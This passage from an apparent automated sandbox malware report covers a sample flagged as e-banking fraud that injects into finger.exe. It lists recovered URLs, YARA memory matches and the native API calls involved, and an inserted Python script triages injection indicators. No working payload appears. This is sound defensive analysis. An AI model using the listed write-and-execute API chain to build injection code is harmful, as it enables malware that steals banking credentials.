                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/5885/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
                Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

                E-Banking Fraud

                barindex
                Source: Yara match | File source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0042CD93 NtClose
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002B60 NtClose, LdrInitializeThunk
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010035C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01004340 NtSetContextThread
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01004650 NtSuspendThread
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002AD0 NtReadFile
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002AF0 NtWriteFile
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002C60 NtCreateKey
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002F30 NtCreateSection
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002FA0 NtQuerySection
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002FB0 NtResumeThread
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002FE0 NtCreateFile
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002EA0 NtAdjustPrivilegesToken
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01002EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01003010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01003090 NtSetValueKey
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_010039B0 NtGetContextThread
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01003D10 NtOpenProcessToken
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_01003D70 NtOpenThread
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03524340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03524650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522BE0 NtQueryValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522BA0 NtEnumerateValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522E80 NtReadVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035235C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_035239B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03522CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03523010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03523090 NtSetValueKey
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03523D70 NtOpenThread
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_03523D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C95F0 NtCreateFile
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C9760 NtReadFile
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C98F0 NtClose
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C9850 NtDeleteFile
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_009C9A60 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_032EFB66 NtSetContextThread
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 10_2_032EF9B8 NtClose
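The two listings above (the URLs recovered from process memory, and the Nt* native calls reached from QmBbqpEHu0.exe and finger.exe) are easier to triage once they are parsed out of the flattened "Source: ..." rows. The Python below is an added example and is not part of the Joe Sandbox report or of Joe Security's tooling. It parses a handful of rows copied from this report (a constructed sample), joins the hex process index in the memory-dump identifier (0000000A) with the decimal one in the code-function id (10_2_...), flags any process whose listed native calls include both a memory-write primitive and a remote-execution primitive, and sorts the URLs into buckets. The host lists behind the buckets and the write/execute API sets are the example's own assumptions (analyst noise lists), not categories the report assigns.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: rows copied from the report above, in the flattened
# "Source: <x>Code function: ..." / "Source: <x>String found in binary or memory: ..." shape.
SAMPLE = r"""
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002D10 NtMapViewOfSection,4_2_01002D10
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002F60 NtCreateProcessEx,4_2_01002F60
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002EE0 NtQueueApcThread,4_2_01002EE0
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01004340 NtSetContextThread,4_2_01004340
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002FB0 NtResumeThread,4_2_01002FB0
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002E30 NtWriteVirtualMemory,4_2_01002E30
Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522B60 NtClose,LdrInitializeThunk,10_2_03522B60
Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03522EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03522EE0
Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_027A3E280_2_027A3E28
"""

# A code-function id is <process index>_<phase>_<8 hex digits>; the id is repeated at the
# end of each row (a fused table column), so it is stripped from the API list below.
CODE_RE = re.compile(r"^Source: (?P<path>.+?)Code function: (?P<fid>\d+_\d+_[0-9A-F]{8})\s?(?P<rest>.*)$")
STR_RE = re.compile(r"^Source: (?P<sources>.+?)String found in binary or memory: (?P<url>\S+)")
# "<image>, <process index as 8 hex digits>.<dump index>..." for each memory dump in the row.
DUMP_RE = re.compile(r"([^\s,]+\.exe), ([0-9A-F]{8})\.[0-9A-F]{8}")

# Assumption (analyst noise lists, not report categories): font-foundry URLs travel in
# embedded font metadata, search-provider URLs in browser configuration.
FONT_HOSTS = {"fontbureau.com", "fonts.com", "founder.com.cn", "galapagosdesign.com",
              "goodfont.co.kr", "jiyu-kobo.co.jp", "sajatypeworks.com", "sakkal.com",
              "sandoll.co.kr", "tiro.com", "typography.net", "urwpp.de", "zhongyicts.com.cn"}
SEARCH_HOSTS = {"ecosia.org", "duckduckgo.com", "search.yahoo.com", "google.com"}
MS_IDENTITY_HOSTS = {"login.live.com"}

# Assumption: a process that can both place code in memory and make a thread run it.
WRITE_APIS = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
EXEC_APIS = {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread", "NtCreateThreadEx"}


def parse_report(text):
    """Split flattened report rows into code-function and string findings."""
    funcs, urls = [], []          # (pid, image, fid, [apis]) / (pid, image, url)
    for line in text.splitlines():
        line = line.strip()
        m = CODE_RE.match(line)
        if m:
            fid = m["fid"]
            pid = int(fid.split("_")[0])                    # decimal process index
            apis = [a for a in m["rest"].split(",") if a and a != fid]
            funcs.append((pid, m["path"], fid, apis))
            continue
        m = STR_RE.match(line)
        if m:
            for image, pid_hex in DUMP_RE.findall(m["sources"]):
                urls.append((int(pid_hex, 16), image, m["url"]))   # hex index -> same pid
    return {"funcs": funcs, "urls": urls}


def bucket_url(url):
    """Classify a recovered URL by host; anything unmatched is left for a human."""
    host = (urlsplit(url).hostname or "").lower()

    def under(domains):
        return any(host == d or host.endswith("." + d) for d in domains)

    if under(FONT_HOSTS):
        return "font-metadata"
    if under(SEARCH_HOSTS):
        return "browser-search-provider"
    if under(MS_IDENTITY_HOSTS):
        return "ms-identity"
    # Rows with a stray trailing byte from the string extractor (typography.netD) land here too.
    return "other"


def url_buckets(parsed):
    out = defaultdict(set)
    for pid, image, url in parsed["urls"]:
        out[bucket_url(url)].add((pid, image, url))
    return out


def injection_candidates(parsed):
    """Per process index: flag if its listed Nt* calls span a write and an execute primitive."""
    apis_by_pid, image_by_pid = defaultdict(set), {}
    for pid, path, fid, apis in parsed["funcs"]:
        apis_by_pid[pid].update(a for a in apis if a.startswith("Nt"))
        image_by_pid[pid] = path
    flagged = {}
    for pid, apis in apis_by_pid.items():
        w, x = apis & WRITE_APIS, apis & EXEC_APIS
        if w and x:
            flagged[pid] = {"image": image_by_pid[pid], "write": sorted(w), "execute": sorted(x)}
    return flagged


if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for pid, info in injection_candidates(parsed).items():
        print(f"process {pid} {info['image']}: write={info['write']} execute={info['execute']}")
    for bucket, rows in sorted(url_buckets(parsed).items()):
        print(bucket, sorted(rows))
```

Run against the sample, only process index 4 (QmBbqpEHu0.exe) is flagged: finger.exe's rows in the sample carry NtQueueApcThread but no write primitive, and the pid-0 row lists no API at all. The transip.eu URL from cqvjCApYGBKzop.exe is the only one left in the "other" bucket, which is where review time should go; the report itself does not say what those strings are for.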
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_027A3E28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_027AE104
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_027A6F90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_074765C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747DDF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747F418
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07477CAA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07478B28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747E3E8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07477708
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747E7D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747E7E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747AE08
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747AE18
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747654D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07476521
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747DDE2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747AC01
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747F408
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747AC10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747E3D8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747EB90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07475A60
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07477271
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747B279
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07479A08
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07478A10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07478ACA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_074799F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747B099
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747E098
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747B0A8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0747E0A8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0765DFC8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07656682
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_076505E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_076505F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_076575D8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07659240
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07659250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07650040
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_0765001D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07657E48
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07659C00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 0_2_07657A10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00418C33
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_004029E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_004011B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00403220
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0042F3D3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0041044B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00410453
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00401CC0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00401CB6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0040E653
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00402E6F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00402E70
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00410673
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00416E33
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0040272C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_00402730
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Code function: 4_2_0040E7A3
